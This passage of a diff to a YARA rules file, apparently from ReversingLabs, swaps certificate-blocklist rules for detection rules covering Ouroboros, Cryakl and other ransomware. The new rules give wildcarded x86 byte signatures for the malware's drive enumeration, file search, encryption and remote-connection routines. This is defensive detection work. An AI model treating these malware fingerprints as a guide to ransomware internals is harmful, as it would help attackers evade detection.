+            ?? 03 DA 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ??
+            ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE 89 7D ?? F7 E9 83 C4 ?? 89 5D ?? C1 FA ?? 8D 4D
+        }
+		$enum_drives_p2 = {
+            8B C2 C1 E8 ?? 03 C2 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? FF 75
+            ?? 50 51 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B
+            4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 FF ?? 0F 8C ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? C6 45 ?? ?? 8B 4D ?? 8B 31
+            3B F1 0F 84 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 8B C8 C6 45
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 C6 45 ?? ?? 8B 4E ?? 89 4F ?? 8B 4E ?? 89 4F ?? 8D
+            4F ?? 8B 46 ?? 89 47 ?? 8D 46 ?? 3B C8 74 ?? 83 78 ?? ?? 8B D0 72 ?? 8B 10 FF 70 ??
+            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" or pe.signatures [ i ] . serial == "98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" ) and 1575849600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_drives_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_86E5A9B9E89E5075C475006D0Ca03832 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ouroboros : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ouroboros ransomware."
 		author = "ReversingLabs"
-		id = "f3058f56-dcbb-532a-b914-5ac0e6d70e6e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "af0b9311-a7dd-56e8-a004-0828af5af5ef"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3696-L3714"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Ouroboros.yara#L1-L175"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5ba0b0f1b104eb11023590b8ef2b9cc747372bc9310a754694d45d3b3ce293e9"
+		logic_hash = "b573f303318452010ff46f21a02b6290820f9a27bf4c51b72f6ed15263b5f433"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ouroboros"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
+            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+        }
+		$remote_connection_p2 = {
+            C6 45 ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 75 ?? 8D 8D ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 45 ?? C6 85 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 50 8B CE C7 06 ?? ?? ?? ?? C6 46 ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ??
+            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
+        }
+		$remote_connection_p3 = {
+            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF
+            75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83
+            FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 95 ?? ?? ??
+            ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
+            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_p4 = {
+            8B 55 ?? C7 06 ?? ?? ?? ?? C6 46 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF
+            70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4
+            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
+            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 0F
+            82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8
+        }
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
+            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
+            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
+            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
+            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
+            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
+            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
+            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
+            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
+            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9
+        }
+		$encrypt_files_p1 = {
+            83 EC ?? 8B 44 24 ?? 53 55 56 8B F1 89 44 24 ?? 57 8B 7C 24 ?? 8B 6E ?? 3B FD 77 ??
+            8B DE 83 FD ?? 72 ?? 8B 1E 57 50 53 89 7E ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 04 1F ?? 8B
+            C6 5F 5E 5D 5B 83 C4 ?? C2 ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B DF 83 CB ??
+            81 FB ?? ?? ?? ?? 76 ?? BB ?? ?? ?? ?? EB ?? 8B CD B8 ?? ?? ?? ?? D1 E9 2B C1 3B E8
+            76 ?? BB ?? ?? ?? ?? EB ?? 8D 04 29 3B D8 0F 42 D8 33 C9 8B C3 83 C0 ?? 0F 92 C1 F7
+            D9 0B C8 51 8B CE E8 ?? ?? ?? ?? 57 FF 74 24 ?? 89 44 24 ?? 50 89 7E ?? 89 5E ?? E8
+            ?? ?? ?? ?? 8B 5C 24 ?? 83 C4 ?? C6 04 1F ?? 83 FD ?? 72 ?? 8B 06 45 81 FD ?? ?? ??
+            ?? 72 ?? 8B 48 ?? 83 C5 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 8B C1 55 50 E8 ?? ?? ?? ??
+            83 C4 ?? 5F 89 1E 8B C6 5E 5D 5B 83 C4 ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC
+            CC CC CC CC 83 EC ?? 53 55 8B 6C 24 ?? 56 57 8B F9 8B 4C 24 ?? 89 4C 24 ?? 8B 5F ??
+            3B EB 77 ?? 89 7C 24 ?? 8B C7 83 FB ?? 72 ?? 8B 07 89 44 24 ?? 8D 34 6D
+        }
+		$encrypt_files_p2 = {
+            89 6F ?? 56 51 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 33 C9 66 89 0C 06 8B C7 5F 5E
+            5D 5B 83 C4 ?? C2 ?? ?? 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F5 83 CE ?? 81 FE ??
+            ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B CB B8 ?? ?? ?? ?? D1 E9 2B C1 3B D8 76 ?? BE
+            ?? ?? ?? ?? EB ?? 8D 04 19 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8
+            51 8B CF E8 ?? ?? ?? ?? 89 77 ?? 8D 34 6D ?? ?? ?? ?? 56 FF 74 24 ?? 89 44 24 ?? 50
+            89 6F ?? E8 ?? ?? ?? ?? 8B 6C 24 ?? 33 C0 83 C4 ?? 66 89 04 2E 83 FB ?? 72 ?? 8B 07
+            8D 1C 5D ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 72 ?? 8B 48 ?? 83 C3 ?? 2B C1 83 C0 ?? 83 F8
+            ?? 77 ?? 8B C1 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 2F 8B C7 5F 5E 5D 5B 83 C4 ?? C2 ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 8B 44 24 ?? 83 EC ?? 83 E0 ?? 89 41 ?? 8B 49 ??
+            23 C8 75 ?? 83 C4 ?? C2 ?? ?? 56 F6 C1 ?? 74 ?? BE ?? ?? ?? ?? EB ?? F6 C1 ?? BE ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 F0 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C
+            24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 5E
+        }
+		$encrypt_files_angus_version = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43
+            8D ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 39 8D ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 42 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and ( pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" or pe.signatures [ i ] . serial == "86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" ) and 1574791194 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( ( all of ( $encrypt_files_p* ) ) or ( $encrypt_files_angus_version ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_075Dca9Ca84B93E8A89B775128F90302 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryakl : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cryakl ransomware."
 		author = "ReversingLabs"
-		id = "2fa6b400-7c6c-5bc4-9cac-78d52003a24e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "5c668278-458e-5b13-83c4-63beab5249ed"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3716-L3732"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cryakl.yara#L1-L64"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "32af21e71fb3475c50de4cd8a24fa0aec1ee67bc01c1a3720c12f9ce822833c3"
+		logic_hash = "51d50ab1ce021e2facbca3a35af372186287a8d69b66651c9804234a409d9932"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cryakl"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UAB GT-servis" and pe.signatures [ i ] . serial == "07:5d:ca:9c:a8:4b:93:e8:a8:9b:77:51:28:f9:03:02" and 1579305601 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "9de11ec8-f408-593c-895f-08dff703ff10"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3734-L3750"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "622e6ed08ca26908539519f37cf493f8030100bd5e88cb05e851b7d56b0f4c0d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_and_encrypt_files_1 = {
+            8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 E0 ?? 83 F8 ?? 75 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 92 ?? ?? ?? ??
+            84 C0 0F 84 ?? ?? ?? ?? FF 75 ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+        }
+		$enum_and_encrypt_files_2 = {
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ??
